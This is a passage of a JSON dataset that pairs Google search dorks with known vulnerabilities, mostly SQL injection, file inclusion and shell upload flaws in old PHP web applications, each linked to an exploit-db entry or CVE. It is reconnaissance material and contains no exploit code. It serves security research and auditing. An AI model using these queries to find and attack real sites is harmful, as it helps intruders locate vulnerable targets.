Vulnerability - CVE: 2007-5122: https://www.exploit-db.com/exploits/4457"}, {"dork": "inurl:\"com_avosbillets\"", "description": "Joomla (com_avosbillets) SQL injection Vulnerability: https://www.exploit-db.com/exploits/11223"}, {"dork": "\"Powered By Aardvark Topsites PHP 4.2.2\"", "description": "Aardvark Topsites PHP 4.2.2 (path) Remote File Inclusion Vuln - CVE: 2006-7026: https://www.exploit-db.com/exploits/1730"}, {"dork": "inurl:\"com_projectfork\"", "description": "Joomla Component com_Projectfork 2.0.10 Local File Inclusion Vuln - CVE: 2009-2100: https://www.exploit-db.com/exploits/8946"}, {"dork": "intext:\"Powered by PHPCityPortal.com\"", "description": "PHPCityPortal (Auth Bypass) Remote SQL Injection Vulnerability - CVE: 2009-4870: https://www.exploit-db.com/exploits/9395"}, {"dork": "intitle:\"jGallery\"", "description": "jGallery 1.3 (index.php) Remote File Inclusion Vulnerability - CVE: 2007-2158: https://www.exploit-db.com/exploits/3760"}, {"dork": "\"Powered by Download 3000\"", "description": "Joomla Component d3000 1.0.0 Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5299"}, {"dork": "intitle:\"zFeeder admin panel\"", "description": "zFeeder 1.6 (admin.php) No Authentication Vulnerability - CVE: 2009-0807: https://www.exploit-db.com/exploits/8092"}, {"dork": "Powered by WebStudio", "description": "WebStudio CMS (pageid) Remote Blind SQL Injection Vuln - CVE: 2008-5336: https://www.exploit-db.com/exploits/7236"}, {"dork": "inurl:\"select_file2.php\"", "description": "Flashden Multiple File Uploader Shell Upload Vulnerability: https://www.exploit-db.com/exploits/10236"}, {"dork": "\"powered by Gradman\"", "description": "Gradman 0.1.3 (info.php tabla) Local File Inclusion Vulnerability - CVE: 2008-0393: https://www.exploit-db.com/exploits/4936"}, {"dork": "\"Designed and Developed by Debliteck Ltd\"", "description": "DB[CMS] (article.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12666"}, {"dork": "\"Powered by mlffat\"", "description": "Mlffat 2.1 (Auth Bypass / Cookie) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8674"}, {"dork": "inurl:\"/squirrelcart/\" -squirrelcart.com", "description": "Squirrelcart 1.x.x (cart.php) Remote File Inclusion Vulnerability - CVE: 2007-4439: https://www.exploit-db.com/exploits/4295"}, {"dork": "Engine powered by easyLink V1.1.0.", "description": "easyLink 1.1.0 (detail.php) Remote SQL Injection Vulnerability - CVE: 2008-6471: https://www.exploit-db.com/exploits/6494"}, {"dork": "allintext: \"This site is powered by IndexScript\"", "description": "IndexScript 2.8 (show_cat.php cat_id) SQL Injection Vulnerability - CVE: 2007-4069: https://www.exploit-db.com/exploits/4225"}, {"dork": "\u00c2\u00a92005 Ocean12 Technologies. All rights reserved", "description": "Ocean12 Membership Manager Pro Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/7245"}, {"dork": "\"powered by PassWiki\"", "description": "PassWiki 0.9.16 RC3 (site_id) Local File Inclusion Vulnerability - CVE: 2008-6423: https://www.exploit-db.com/exploits/5704"}, {"dork": "\"software 2004-2005 by randshop\"", "description": "Randshop 1.1.1 (header.inc.php) Remote File Include Vulnerability - CVE: 2006-3375: https://www.exploit-db.com/exploits/1971"}, {"dork": "\"powered by phpEmployment\"", "description": "phpEmployment (php upload) Arbitrary File Upload Vulnerability - CVE: 2008-6920: https://www.exploit-db.com/exploits/7563"}, {"dork": "inurl:\"wp-download.php?dl_id=\"", "description": "Wordpress Plugin Download (dl_id) SQL Injection Vulnerability - CVE: 2008-1646: https://www.exploit-db.com/exploits/5326"}, {"dork": "\"\u00a9 2004 PHPKick.de Version 0.8\"", "description": "PHPKick v0.8 statistics.php SQL Injection - CVE: 2010-3029: https://www.exploit-db.com/exploits/14578"}, {"dork": "\"Powered by VS PANEL\"", "description": "VS PANEL 7.3.6 (Cat_ID) Remote SQL Injection Vulnerability - CVE: 2009-3590: https://www.exploit-db.com/exploits/8506"}, {"dork": "\"powered by phpmydirectory\" OR intext:\"2001-2006 phpMyDirectory.com\"", "description": "phpMyDirectory 10.4.4 (ROOT_PATH) Remote Inclusion Vulnerability - CVE: 2006-2521: https://www.exploit-db.com/exploits/1808"}, {"dork": "intext:\"Kalimat news system v 1.0\"", "description": "kalimat new system v 1.0 (index.php) SQL Injection: https://www.exploit-db.com/exploits/11563"}, {"dork": "Powered by: PhotoPost PHP 4.6", "description": "PhotoPost PHP SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14446"}, {"dork": "\"Powered by Maian Recipe v1.0\"", "description": "Maian Recipe 1.0 (path_to_folder) Remote File Include Vulnerability - CVE: 2007-0848: https://www.exploit-db.com/exploits/3284"}, {"dork": "\"Powered by CommonSense CMS\"", "description": "CommonSense CMS Sql Injection Vulnerability: https://www.exploit-db.com/exploits/13762"}, {"dork": "\"Eyeland Studio Inc. All Rights Reserved.\" inurl:game.php", "description": "Eyeland Studio Inc. (game.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13858"}, {"dork": "\"powered by Pagetool\"", "description": "Pagetool 1.07 (news_id) Remote SQL Injection Vulnerability - CVE: 2007-3402: https://www.exploit-db.com/exploits/4107"}, {"dork": "powered by jshop", "description": "Jshop Server 1.3 (fieldValidation.php) Remote File Include Vulnerability - CVE: 2007-0232: https://www.exploit-db.com/exploits/3113"}, {"dork": "/modules/mx_links/", "description": "mxBB Module WebLinks 2.05 Remote Inclusion Vulnerability - CVE: 2006-6645: https://www.exploit-db.com/exploits/2939"}, {"dork": "inurl:\"?pageNum_RSnews\"&view", "description": "NUs Newssystem v1.02 (id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11674"}, {"dork": "inurl:index.php?option=com_directory", "description": "Joomla Component mosDirectory 2.3.2 (catid) SQL Injection Vulnerability - CVE: 2008-0690: https://www.exploit-db.com/exploits/5047"}, {"dork": "\"Powered By DynamicPAD\"", "description": "DynamicPAD 1.02.18 (HomeDir) Remote File Inclusion Vulnerabilities - CVE: 2007-2527: https://www.exploit-db.com/exploits/3868"}, {"dork": "\"Powered by : elkagroup.com\"", "description": "elkagroup (pid ) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10836"}, {"dork": "\"com_joom12pic\"", "description": "Joomla Component joom12Pic 1.0 Remote File Inclusion Vulnerability - CVE: 2007-4954: https://www.exploit-db.com/exploits/4416"}, {"dork": "\"Starting bid\" \"Powered by SoftbizScripts\"", "description": "Softbiz Auctions Script product_desc.php Remote SQL Injection Vuln - CVE: 2007-5999: https://www.exploit-db.com/exploits/4617"}, {"dork": "\"Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license", "description": "Liberum Help Desk 0.97.3 (details.asp) SQL Injection Vulnerability - CVE: 2006-6160: https://www.exploit-db.com/exploits/2846"}, {"dork": "allinurl:\"jokes.php?catagorie=\"", "description": "Jokes Site Script (jokes.php?catagorie) SQL Injection Vulnerability - CVE: 2008-2065: https://www.exploit-db.com/exploits/5508"}, {"dork": "\"Created by weenCompany\"", "description": "weenCompany SQL Injection Vulnerability - CVE: 2009-4423: https://www.exploit-db.com/exploits/10606"}, {"dork": "intext:\"Powered by eStore v1.0.2\"", "description": "eStore v1.0.2 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10784"}, {"dork": "\"Powered by: Elite Gaming Ladders v3.2\"", "description": "Elite Gaming Ladders 3.2 (platform) SQL Injection Vulnerability - CVE: 2009-3314: https://www.exploit-db.com/exploits/9702"}, {"dork": "php-addressbook v3.1.5", "description": "php-addressbook v3.1.5(edit.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10877"}, {"dork": "\"Powered by ParsBlogger\"", "description": "ParsBlogger (blog.asp wr) Remote SQL Injection Vulnerability - CVE: 2008-5637: https://www.exploit-db.com/exploits/7239"}, {"dork": "intitle:\"vrnews v1\"", "description": "VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability - CVE: 2007-3611: https://www.exploit-db.com/exploits/4150"}, {"dork": "inurl:\"customer_testimonials.php\"", "description": "osCommerce Addon Customer Testimonials 3.1 SQL Injection Vulnerability - CVE: 2008-0719: https://www.exploit-db.com/exploits/5075"}, {"dork": "\"Powered by Espinas IT\"", "description": "Espinas CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12100"}, {"dork": "\"Powered by iNetScripts\"", "description": "Powered by iNetScripts: Shell Upload Vulnerability: https://www.exploit-db.com/exploits/12384"}, {"dork": "Maintained with the Ocean12 Poll Manager Pro v1.00", "description": "Ocean12 Poll Manager Pro Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/7246"}, {"dork": "allinurl: \"com_glossary\"", "description": "Mambo Component Glossary 2.0 (catid) SQL Injection Vulnerability - CVE: 2008-0514: https://www.exploit-db.com/exploits/5010"}, {"dork": "\"\u00a9 2009 Azimut Technologie\"", "description": "Azimut Technologie Admin Login Bypass vulnerability: https://www.exploit-db.com/exploits/12695"}, {"dork": "inurl:buyer/about_us.php?BuyerID", "description": "Alibaba Clone Platinum (about_us.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12612"}, {"dork": "Maintained with the Ocean12 Calendar Manager Gold v2.04", "description": "Ocean12 Calendar Manager Gold Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/7247"}, {"dork": "pagerank-0-topliste.html OR pagerank-0-tipp.html", "description": "phpscripts Ranking Script Insecure Cookie Handling Vulnerability - CVE: 2008-6092: https://www.exploit-db.com/exploits/6649"}, {"dork": "Copyright \u00c2\u00a9 2007 BrowserCRM Ltd", "description": "BrowserCRM 5.002.00 (clients.php) Remote File Inclusion Vulnerability - CVE: 2008-2689: https://www.exploit-db.com/exploits/5757"}, {"dork": "Powered by UCenter inurl:shop.php?ac=view", "description": "UCenter Home 2.0 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14997"}, {"dork": "\"Sinapis by scripter.ch\"", "description": "Sinapis Forum 2.2 (sinapis.php fuss) Remote File Include Vulnerability - CVE: 2007-1131: https://www.exploit-db.com/exploits/3367"}, {"dork": "\"Powered by BosClassifieds Classified Ads System\"", "description": "BosClassifieds 3.0 (index.php cat) SQL Injection Vulnerability - CVE: 2008-1838: https://www.exploit-db.com/exploits/5444"}, {"dork": "\"Powered by RGameScript\"", "description": "RGameScript Pro (page.php id) Remote File Inclusion Vulnerability - CVE: 2007-3980: https://www.exploit-db.com/exploits/4210"}, {"dork": "inurl:\"/files/redirect.asp\"", "description": "JBS v2.0 | JBSX - Administration panel bypass and Malicious File Upload Vulnerability: https://www.exploit-db.com/exploits/10161"}, {"dork": "\"Easy-Clanpage v2.2\"", "description": "Easy-Clanpage 2.2 (id) Remote SQL Injection Vulnerability - CVE: 2008-1425: https://www.exploit-db.com/exploits/5275"}, {"dork": "inurl:\"/plugins/ImageManager/manager.php\"", "description": "Wordpress Image Manager Plugins Shell Upload Vulnerability: https://www.exploit-db.com/exploits/10325"}, {"dork": "\"com_joomlaflashfun\"", "description": "Joomla Component Flash Fun! 1.0 Remote File Inclusion Vulnerability - CVE: 2007-4955: https://www.exploit-db.com/exploits/4415"}, {"dork": "Powered by BKWorks ProPHP Version 0.50 Beta 1", "description": "BKWorks ProPHP 0.50b1 (Auth Bypass) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/7726"}, {"dork": "Powered by Sisfo Kampus 2006", "description": "Sisfo Kampus 2006 (blanko.preview.php) Local File Disclosure Vuln - CVE: 2007-4820: https://www.exploit-db.com/exploits/4380"}, {"dork": "inurl:\"sticker/sticker.php?id=\"", "description": "2Capsule (sticker.php id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/7631"}, {"dork": "inurl:quizinfo.php", "description": "PHP-MySQL-Quiz SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10876"}, {"dork": "\"Powered by Md-Pro\"", "description": "Md-Pro 1.0.8x (Topics topicid) Remote SQL Injection Vulnerability - CVE: 2007-3938: https://www.exploit-db.com/exploits/4199"}, {"dork": "inurl:\"index.php?option=com_simpleboard\"", "description": "Mambo Component Simpleboard 1.0.3 (catid) SQL Injection Vulnerability - CVE: 2008-1077: https://www.exploit-db.com/exploits/5195"}, {"dork": "inurl:\"tradeCategory.php?id= \"", "description": "Hampshire Trading Standards Script SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12768"}, {"dork": "inurl:\"com_omphotogallery\"", "description": "Joomla Omilen Photo Gallery 0.5b Local File Inclusion Vulnerability - CVE: 2009-4202: https://www.exploit-db.com/exploits/8870"}, {"dork": "inurl:\"sinagb.php\"", "description": "Sinapis 2.2 Gastebuch (sinagb.php fuss) Remote File Include Vulnerability - CVE: 2007-1130: https://www.exploit-db.com/exploits/3366"}, {"dork": "inurl:csc_article_details.php", "description": "CaupoShop Classic 1.3 (saArticle[ID]) Remote SQL Injection Vulnerability - CVE: 2008-2866: https://www.exploit-db.com/exploits/5865"}, {"dork": "inurl:index.php?page=img Powered By Mini File Host", "description": "Mini File Host 1.x Arbitrary PHP File Upload Vulnerability - CVE: 2008-6785: https://www.exploit-db.com/exploits/7509"}, {"dork": "allinurl:com_pccookbook", "description": "pc_cookbook Mambo Component 0.3 Include Vulnerability - CVE: 2006-3530: https://www.exploit-db.com/exploits/2024"}, {"dork": "\"Powered by LDU\"", "description": "LDU 8.x (polls.php) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/2871"}, {"dork": "intext:\"powered by tincan ltd\"", "description": "tincan ltd (section) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11113"}, {"dork": "\"REALTOR 747 - Version 4.11\"", "description": "Realtor 747 (define.php INC_DIR) Remote File Inclusion Vulnerability - CVE: 2009-0495: https://www.exploit-db.com/exploits/7743"}, {"dork": "inurl:\"view_group.php?group_id=\"", "description": "Vastal I-Tech SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12845"}, {"dork": "\"CzarNews v1.12 \" | \"CzarNews v1.13\" | \"CzarNews v1.14 \"", "description": "CzarNews 1.14 (tpath) Remote File Inclusion Vulnerability - CVE: 2006-3685: https://www.exploit-db.com/exploits/2009"}, {"dork": "inurl:\"filebase.php\" \"Powered by phpBB\"", "description": "phpBB Mod FileBase (id) Remote SQL Injection Vulnerability - CVE: 2008-1305: https://www.exploit-db.com/exploits/5236"}, {"dork": "allinurl: \"name Sections op viewarticle artid\"", "description": "PHP-Nuke Module Sections (artid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5154"}, {"dork": "\"Powered by samart-cms\"", "description": "samart-cms 2.0 (contentsid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5862"}, {"dork": "Ultimate-Fun-Book 1.02", "description": "Ultimate Fun Book 1.02 (function.php) Remote File Include Vulnerability - CVE: 2007-1059: https://www.exploit-db.com/exploits/3336"}, {"dork": "allinurl: \"modules/dictionary/detail.php?id\"", "description": "XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability - CVE: 2009-4582: https://www.exploit-db.com/exploits/10807"}, {"dork": "\"Copyright (C) 2000 Phorum Development Team\"", "description": "Phorum 3.2.11 (common.php) Remote File Include Vulnerability - CVE: 2006-6550: https://www.exploit-db.com/exploits/2894"}, {"dork": "inurl:flashblog.html OR inurl:/flashblog/", "description": "FlashBlog 0.31b Remote Arbitrary File Upload Vulnerability - CVE: 2008-2574: https://www.exploit-db.com/exploits/5728"}, {"dork": "\"Powered By CMS-BRD\"", "description": "CMS-BRD (menuclick) Remote SQL Injection Vulnerability - CVE: 2008-2837: https://www.exploit-db.com/exploits/5863"}, {"dork": "\"inurl:/admin/\" \"ImageVue\"", "description": "ImageVue 2.0 Remote Admin Login: https://www.exploit-db.com/exploits/10630"}, {"dork": "\"TROforum 0.1\"", "description": "TROforum 0.1 (admin.php site_url) Remote File Inclusion Vulnerability - CVE: 2007-2937: https://www.exploit-db.com/exploits/3995"}, {"dork": "\"Uploader by CeleronDude.\"", "description": "Uploader by CeleronDude 5.3.0 Shell Upload: https://www.exploit-db.com/exploits/10523"}, {"dork": "\"Review Script\" \"Phil Taylor\"", "description": "Mambo Component Comments 0.5.8.5g SQL Injection Vulnerability - CVE: 2008-0773: https://www.exploit-db.com/exploits/5094"}, {"dork": "intitle:Mp3 ToolBox 1.0", "description": "Mp3 ToolBox 1.0 beta 5 (skin_file) Remote File Inclusion Vulnerability - CVE: 2007-6139: https://www.exploit-db.com/exploits/4650"}, {"dork": "Powered by: Maian Greetings v2.1", "description": "Maian Greetings 2.1 Insecure Cookie Handling Vulnerability - CVE: 2008-7086: https://www.exploit-db.com/exploits/6050"}, {"dork": "allinurl: \"com_alberghi\" detail", "description": "Joomla Component Alberghi 2.1.3 (id) SQL Injection Vulnerability - CVE: 2008-1459: https://www.exploit-db.com/exploits/5278"}, {"dork": "\"Powered By phpBB Garage 1.2.0\"", "description": "phpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability - CVE: 2007-6223: https://www.exploit-db.com/exploits/4686"}, {"dork": "inurl:index.php?option=com_ynews", "description": "Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability - CVE: 2008-0653: https://www.exploit-db.com/exploits/5072"}, {"dork": "\"Powie's PSCRIPT MatchMaker 4.05\"", "description": "Powies MatchMaker 4.05 (matchdetail.php) SQL Injection Vulnerability - CVE: 2006-6039: https://www.exploit-db.com/exploits/2798"}, {"dork": "inurl:etkinlikbak.asp", "description": "Okul Web Otomasyon Sistemi 4.0.1 Remote SQL Injection Vulnerability - CVE: 2007-0305: https://www.exploit-db.com/exploits/3135"}, {"dork": "\"Copyright 2008 ImenAfzar ver :2.0.0.0\"", "description": "Namad (IMenAfzar) 2.0.0.0 Remote File Disclosure Vulnerability: https://www.exploit-db.com/exploits/8734"}, {"dork": "allinurl:com_comprofiler", "description": "Joomla Community Builder 1.0.1 Blind SQL Injection Vulnerability - CVE: 2008-2093: https://www.exploit-db.com/exploits/5491"}, {"dork": "inurl:\"com_joomlaradiov5\"", "description": "Joomla Component joomlaradio v5 Remote File Inclusion Vulnerability - CVE: 2007-4923: https://www.exploit-db.com/exploits/4401"}, {"dork": "\"powered by phpAdBoard\"", "description": "phpAdBoard (php uploads) Arbitrary File Upload Vulnerability - CVE: 2008-6921: https://www.exploit-db.com/exploits/7562"}, {"dork": "\"Powered by Quick.Cms\"", "description": "Quick.Cms.Lite 0.5 (id) Remote SQL Injection Vulnerability - CVE: 2009-1410: https://www.exploit-db.com/exploits/8505"}, {"dork": "\"Powered by wpQuiz\" inurl:index.php", "description": "wpQuiz v2.7 Authentication Bypass Vulnerability - CVE: 2010-3608: https://www.exploit-db.com/exploits/15075"}, {"dork": "\"Powered by UCStats version 1.1\"", "description": "UCStats v1.1 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10891"}, {"dork": "\"Powered by CCLeague Pro\"", "description": "CCLeague Pro 1.2 Insecure Cookie Authentication Vulnerability - CVE: 2008-5123: https://www.exploit-db.com/exploits/5888"}, {"dork": "intitle:Bilder Galerie 1.1 or intitle:Bilder Galerie", "description": "MatPo Bilder Galerie 1.1 Remote File Inclusion Vulnerability - CVE: 2007-6649: https://www.exploit-db.com/exploits/4815"}, {"dork": "\"Powered by: PostGuestbook 0.6.1\"", "description": "PHP-Nuke Module PostGuestbook 0.6.1 (tpl_pgb_moddir) RFI Vulnerability - CVE: 2007-1372: https://www.exploit-db.com/exploits/3423"}, {"dork": "\"powered by sunshop\"", "description": "SunShop Shopping Cart 3.5 (abs_path) RFI Vulnerabilities - CVE: 2007-2070: https://www.exploit-db.com/exploits/3748"}, {"dork": "Powered by SkaDate Dating", "description": "SkaDate Online 5.0/6.0 Remote File Disclosure Vulnerability - CVE: 2007-5299: https://www.exploit-db.com/exploits/4493"}, {"dork": "inurl:\"ibase site:de\"", "description": "ibase 2.03 (download.php) Remote File Disclosure Vulnerability - CVE: 2008-6288: https://www.exploit-db.com/exploits/6126"}, {"dork": "\"Powered by sNews\"", "description": "sNews v1.7 (index.php?category) SQL Injection Vulnerability - CVE: 2010-2926: https://www.exploit-db.com/exploits/14465"}, {"dork": "\"Powered by Gravy Media\"", "description": "Gravy Media Photo Host 1.0.8 Local File Disclosure Vulnerability - CVE: 2009-2184: https://www.exploit-db.com/exploits/8996"}, {"dork": "inurl:\"index.php?option=com_djiceshoutbox\"", "description": "Joomla Djice Shoutbox 1.0 Permanent XSS Vulnerability: https://www.exploit-db.com/exploits/8197"}, {"dork": "inurl:com_filiale", "description": "Joomla Component Filiale 1.0.4 (idFiliale) SQL Injection Vulnerability - CVE: 2008-1935: https://www.exploit-db.com/exploits/5488"}, {"dork": "\"Powered By AV Arcade\"", "description": "AV Arcade 2.1b (index.php id) Remote SQL Injection Vulnerability - CVE: 2007-3563: https://www.exploit-db.com/exploits/4138"}, {"dork": "Powered by NATTERCHAT v 1.1", "description": "NatterChat 1.1 (Auth Bypass) Remote SQL Injection Vulnerability - CVE: 2008-7049: https://www.exploit-db.com/exploits/7172"}, {"dork": "ogrencimezunlar.php", "description": "Okul Merkezi Portal 1.0 (ataturk.php) Remote File Include Vulnerability: https://www.exploit-db.com/exploits/3012"}, {"dork": "inurl:index.php?option=com_yanc \"listid\"", "description": "Joomla Component com_yanc SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11603"}, {"dork": "Powered by 6rbScript", "description": "6rbScript (news.php newsid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5663"}, {"dork": "powered by vpasp v 6.50", "description": "VP-ASP Shopping Cart 6.50 Database Disclosure Vulnerability - CVE: 2008-5929: https://www.exploit-db.com/exploits/7438"}, {"dork": "allinurl:\"/questcms/\"", "description": "QuestCMS (main.php) Remote File Include Vulnerability: https://www.exploit-db.com/exploits/2137"}, {"dork": "inurl:com_eQuotes", "description": "Joomla Component equotes 0.9.4 Remote SQL injection Vulnerability - CVE: 2008-2628: https://www.exploit-db.com/exploits/5723"}, {"dork": "\"Powered by Xplode CMS\"", "description": "Xplode CMS (wrap_script) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8373"}, {"dork": "Powered by Jewelry Cart Software", "description": "Jewelry Cart Software (product.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11826"}, {"dork": "\"Dise\u00f1o Web Hernest Consulting S.L.\"", "description": "Administrador de Contenidos Admin Login Bypass vulnerability: https://www.exploit-db.com/exploits/12527"}, {"dork": "inurl:com_cpg", "description": "Mambo CopperminePhotoGalery Component Remote Include Vulnerability - CVE: 2006-4321: https://www.exploit-db.com/exploits/2196"}, {"dork": "inurl:ratelink.php?lnkid=", "description": "Link Trader (lnkid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10834"}, {"dork": "\"CNStats 2.9\"", "description": "CNStats 2.9 (who_r.php bj) Remote File Inclusion Vulnerability - CVE: 2007-2086: https://www.exploit-db.com/exploits/3741"}, {"dork": "\"Browse with Interactive Map\"", "description": "PHP Real Estate (fullnews.php id) Remote SQL Injection Vulnerability - CVE: 2007-6462: https://www.exploit-db.com/exploits/4737"}, {"dork": "intext:\"Powered By Azaronline.com\"", "description": "Azaronline Design SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15391"}, {"dork": "Powered by ephpscripts", "description": "E-Shop Shopping Cart Script (search_results.php) SQL Injection Vuln - CVE: 2008-5838: https://www.exploit-db.com/exploits/6398"}, {"dork": "\"powered by Blog System\"", "description": "Blog System 1.x (note) SQL Injection Vuln - CVE: 2010-0458: https://www.exploit-db.com/exploits/11216"}, {"dork": "\"Powered by DWdirectory\"", "description": "DWdirectory 2.1 Remote SQL Injection Vulnerability - CVE: 2007-6392: https://www.exploit-db.com/exploits/4708"}, {"dork": "\"2005 www.frank-karau.de\" | \"2006 www.frank-karau.de\"", "description": "GL-SH Deaf Forum 6.4.4 Local File Inclusion Vulnerabilities - CVE: 2007-3535: https://www.exploit-db.com/exploits/4124"}, {"dork": "inurl:jgs_treffen.php", "description": "Woltlab Burning Board Addon JGS-Treffen SQL Injection Vulnerability - CVE: 2008-1640: https://www.exploit-db.com/exploits/5329"}, {"dork": "\"Powered by SoftbizScripts\" inurl:\"searchresult.php?sbcat_id=\"", "description": "Softbiz Recipes Portal Script Remote SQL Injection Vulnerability - CVE: 2007-5449: https://www.exploit-db.com/exploits/4527"}, {"dork": "Powered by SNETWORKS PHP CLASSIFIEDS", "description": "SNETWORKS PHP CLASSIFIEDS 5.0 Remote File Inclusion Vulnerability - CVE: 2008-0137: https://www.exploit-db.com/exploits/4838"}, {"dork": "inurl:Editor/assetmanager/assetmanager.asp", "description": "Asset Manager Remote File upload Vulnerability: https://www.exploit-db.com/exploits/12693"}, {"dork": "inurl:makaledetay.asp?id=", "description": "Mayasan Portal v2.0 (makaledetay.asp) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14420"}, {"dork": "inurl: Powered by Traidnt UP Version 1.0.", "description": "Traidnt UP Version 1.0 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/8006"}, {"dork": "inurl:\"com_linkr\"", "description": "Joomla Component com_linkr - Local File Inclusion: https://www.exploit-db.com/exploits/11756"}, {"dork": "inurl:\"com_janews\"", "description": "Joomla Component com_janews - Local File Inclusion - CVE: 2010-1219: https://www.exploit-db.com/exploits/11757"}, {"dork": "inurl:\"com_sectionex\"", "description": "Joomla Component com_sectionex - Local File Inclusion: https://www.exploit-db.com/exploits/11759"}, {"dork": "inurl:\"com_rokdownloads\"", "description": "Joomla Component com_rokdownloads - Local File Inclusion - CVE: 2010-1056: https://www.exploit-db.com/exploits/11760"}, {"dork": "inurl:\"com_ganalytics\"", "description": "Joomla Component com_ganalytics - Local File Inclusion: https://www.exploit-db.com/exploits/11758"}, {"dork": "inurl:/phpfootball/", "description": "PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability - CVE: 2007-0638: https://www.exploit-db.com/exploits/3226"}, {"dork": "\"Search Adult Directory:\"", "description": "Adult Directory (cat_id) Remote SQL Injection Vulnerability - CVE: 2007-4056: https://www.exploit-db.com/exploits/4238"}, {"dork": "inurl:forum_answer.php?que_id", "description": "AlstraSoft AskMe Pro 2.1 (profile.php?id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14986"}, {"dork": "allinurl:index.php?act=publ", "description": "Qwerty CMS (id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8104"}, {"dork": "inurl:\"com_cartweberp\"", "description": "Joomla Component com_cartweberp LFI Vulnerability - CVE: 2010-0982: https://www.exploit-db.com/exploits/10942"}, {"dork": "\"PHPAuction GPL Enhanced V2.51 by AuctionCode.com\"", "description": "Auction_Software Script Admin Login Bypass vulnerability: https://www.exploit-db.com/exploits/14247"}, {"dork": "inurl:com_doqment", "description": "Joomla Component com_doqment (cid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10965"}, {"dork": "intext:PHPhotoalbum v0.5", "description": "PHPhotoalbum 0.5 Multiple Remote SQL Injection Vulnerabilities - CVE: 2008-2501: https://www.exploit-db.com/exploits/5683"}, {"dork": "\"Powered by OnePound\"", "description": "onepound shop 1.x products.php SQL Injection Vulnerability: https://www.exploit-db.com/exploits/9138"}, {"dork": "\"Powered By : Yamamah Version 1.00\"", "description": "Yamamah Photo Gallery 1.00 (download.php) Local File Disclosure Vulnerability - CVE: 2010-2334: https://www.exploit-db.com/exploits/13856"}, {"dork": "\"powered by SnoGrafx\"", "description": "SnoGrafx (cat.php?cat) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14523"}, {"dork": "allinurl:\"xGb.php\"", "description": "xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability - CVE: 2007-4637: https://www.exploit-db.com/exploits/4336"}, {"dork": "\"Powered by ForumApp\"", "description": "ForumApp 3.3 Remote Database Disclosure Vulnerability - CVE: 2008-6147: https://www.exploit-db.com/exploits/7599"}, {"dork": "inurl:/component/jeeventcalendar/", "description": "Joomla JE Event Calendar LFI Vulnerability: https://www.exploit-db.com/exploits/14062"}, {"dork": "allinurl: page_id album \"photo\"", "description": "Wordpress Photo album Remote SQL Injection Vulnerability - CVE: 2008-0939: https://www.exploit-db.com/exploits/5135"}, {"dork": "\"Powered by beamospetition 1.0.12\"", "description": "Joomla Component beamospetition 1.0.12 SQL Injection / XSS - CVE: 2009-0378: https://www.exploit-db.com/exploits/7847"}, {"dork": "\"Powered by 68kb\"", "description": "68kb Knowledge Base Script v1.0.0rc2 Search SQL Injection: https://www.exploit-db.com/exploits/11925"}, {"dork": "\"powered by devalcms v1.4.a\"", "description": "devalcms 1.4a XSS / Remote Code Execution - CVE: 2008-6982: https://www.exploit-db.com/exploits/6369"}, {"dork": "inurl:com_webring", "description": "Joomla Webring Component 1.0 Remote Include Vulnerability - CVE: 2006-4129: https://www.exploit-db.com/exploits/2177"}, {"dork": "inurl:hikaye.asp?id=", "description": "Caner Hikaye Script SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14419"}, {"dork": "intext:Design by: runt communications", "description": "runt-communications Design SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12707"}, {"dork": "Copyright Agares Media phpautovideo", "description": "phpAutoVideo CSRF Vulnerability - OSVDB-ID: 62450: https://www.exploit-db.com/exploits/11502"}, {"dork": "\"Powered by DVHome.cn\"", "description": "PHP TopTree BBS 2.0.1a (right_file) Remote File Inclusion Vulnerability - CVE: 2007-2544: https://www.exploit-db.com/exploits/3854"}, {"dork": "\"powered by ExtCalendar v2\"", "description": "com_extcalendar Mambo Component 2.0 Include Vulnerability: https://www.exploit-db.com/exploits/2022"}, {"dork": "\"Search | Invite | Mail | Blog | Forum\"", "description": "Myspace Clone Script (index.php) Remote File Inclusion Vulnerability - CVE: 2007-6057: https://www.exploit-db.com/exploits/4628"}, {"dork": "\"AcmlmBoard v1.A2\"", "description": "AcmlmBoard 1.A2 (pow) Remote SQL 